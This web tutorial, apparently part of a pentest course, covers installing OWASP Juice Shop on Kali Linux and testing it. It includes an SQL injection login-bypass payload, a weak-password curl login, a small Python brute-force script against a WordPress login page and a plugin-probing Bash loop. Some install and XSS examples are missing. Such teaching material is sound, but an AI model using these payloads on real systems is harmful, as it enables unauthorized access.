Kali Linux Juice Shop Pentest Course
# Kali Linux Juice Shop Pentest Course – Section 5/5: Mastering Pentesting with Juice Shop
## Introduction
In this final section of the Kali Linux Juice Shop Pentest Course, we will explore the installation and configuration of the Juice Shop application on Kali Linux, delve into its usage through practical, step-by-step examples, and examine real-world use cases of web application penetration testing. This course will provide you with the necessary skills to identify vulnerabilities in web applications using Juice Shop, equipping you with both theoretical knowledge and hands-on experience.
## 1. Installation and Configuration on Kali Linux
### 1.1 Prerequisites
Before you begin, ensure you have the following:
– A running instance of Kali Linux (preferably the latest version)
– Basic understanding of terminal commands and web application security concepts
### 1.2 Installing Node.js and npm
To run Juice Shop, you must have Node.js and npm (Node Package Manager) installed on your Kali system. Follow these steps:
1. **Open the terminal.**
2. **Update your package manager:**
sudo apt update && sudo apt upgrade
3. **Install Node.js and npm:**
sudo apt install nodejs npm
4. **Verify the installation:**
### 1.3 Downloading Juice Shop
You can download Juice Shop from its GitHub repository. Use the following commands:
1. **Clone the repository:**
git clone https://github.com/OWASP/juice-shop.git
2. **Navigate to the Juice Shop directory:**
### 1.4 Installing Dependencies
After downloading the Juice Shop application, install its dependencies using npm:
### 1.5 Starting the Application
Once the dependencies are installed, you can start Juice Shop with the following command:
By default, the application will be available at `http://localhost:3000`.
### 1.6 Accessing Juice Shop
Open your web browser and navigate to `http://localhost:3000`. You should see the Juice Shop user interface, confirming that the application is up and running.
## 2. Step-by-Step Usage and Real-World Use Cases
In this section, we will explore how to use Juice Shop for penetration testing and various scenarios you might encounter.
### 2.1 Understanding the Application Structure
Juice Shop is designed to be a deliberately insecure web application. The key areas to focus on include:
– **Authentication**: User login and registration functionalities
– **Product Listings**: Browsing and adding products to the cart
– **Admin Interface**: Accessing administrative functionalities
– **API Endpoints**: Interacting with the backend through RESTful APIs
### 2.2 Conducting a Basic Penetration Test
**Step 1: Reconnaissance**
Find out the version of the Juice Shop application and its dependencies by inspecting the headers and the application response.
[/dm_code_snippet]markdown
# Use curl to inspect the headers
curl -I http://localhost:3000
[/dm_code_snippet]
**Step 2: Scanning for Vulnerabilities**
Utilize tools like OWASP ZAP or Burp Suite to scan for common vulnerabilities. You can configure ZAP to intercept requests between your browser and Juice Shop.
[/dm_code_snippet]markdown
# Start ZAP
zap.sh
[/dm_code_snippet]
**Step 3: Manual Testing**
Check for common vulnerabilities such as:
– **SQL Injection**: Attempt to manipulate input fields in the login area.
– **Cross-Site Scripting (XSS)**: Insert malicious scripts into input fields and observe if they are executed.
For instance, in the login form, try entering the following in the email field to test for XSS:
[/dm_code_snippet]html
[/dm_code_snippet]
### 2.3 Exploiting Known Vulnerabilities
Juice Shop contains several known vulnerabilities for educational purposes. Familiarize yourself with these:
1. **Broken Authentication**: Test the login functionality with weak passwords.
2. **Sensitive Data Exposure**: Check if any sensitive information is being sent without encryption.
For example, you can use the following curl command to log in with a weak password:
curl -X POST -H "Content-Type: application/json" -d '{"email":"[email protected]","password":"admin"}' http://localhost:3000/Users/login
### 2.4 Real-World Scenario: Testing for SQL Injection
1. **Identify Input Vulnerabilities**: Look for input fields that interact with the database, such as search or login forms.
2. **Inject Malicious SQL Code**: For example, in the login form, try:
[/dm_code_snippet]sql
' OR '1'='1'; —
[/dm_code_snippet]
This SQL payload attempts to bypass authentication.
### 3. Detailed Technical Explanations and External Reference Links
#### 3.1 Understanding SQL Injection
SQL Injection (SQLi) vulnerabilities occur when an application improperly exposes user input to SQL queries. For an in-depth understanding, refer to the OWASP SQL Injection documentation:
[OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
#### 3.2 XSS Vulnerabilities
Cross-Site Scripting (XSS) can lead to session hijacking and data theft. For further reading, check the OWASP XSS page:
[OWASP XSS](https://owasp.org/www-community/attacks/xss/)
### 4. Code Examples for WordPress Penetration Testing
While the focus is on Juice Shop, understanding WordPress weaknesses can enhance your skill set as a pentester. Here are some basic code snippets to test a WordPress site for vulnerabilities:
**4.1 Testing for Admin Access**
To gain access to the WordPress admin panel, try to guess the password using a simple brute-force script:
[/dm_code_snippet]python
import requests
url = "http://yourwordpresssite.com/wp-login.php"
username = "admin"
passwords = ["password123", "123456", "letmein"]
for password in passwords:
response = requests.post(url, data={'log': username, 'pwd': password})
if "Dashboard" in response.text:
print(f"Found password: {password}")
break
[/dm_code_snippet]
**4.2 Checking for Vulnerable Plugins**
Many WordPress plugins can have vulnerabilities. Run this Bash script to check for known vulnerable plugins:
#!/bin/bash
plugins=("wp-file-manager" "wp-statistics" "revslider")
for plugin in "${plugins[@]}"
do
echo "Checking for $plugin vulnerability…"
# A command that checks if the plugin is installed or outdated
curl -s "http://yourwordpresssite.com/wp-content/plugins/$plugin/" | grep "plugin-version-indicator"
done
## Conclusion
In this comprehensive course on mastering pentesting with Juice Shop, you have learned how to install and configure Juice Shop on Kali Linux, use it for penetration testing, and explore various vulnerabilities. By applying these techniques, you can undertake real-world web application security assessments and enhance your skills as a white-hat hacker.
For continuous learning, stay updated with the OWASP guidelines and contributions to the security community.
To ensure a thorough understanding, practice these techniques on your local Juice Shop instance safely. The hands-on experience will be invaluable in your journey as a penetration tester.
—
Made by pablo rotem / פבלו רותם
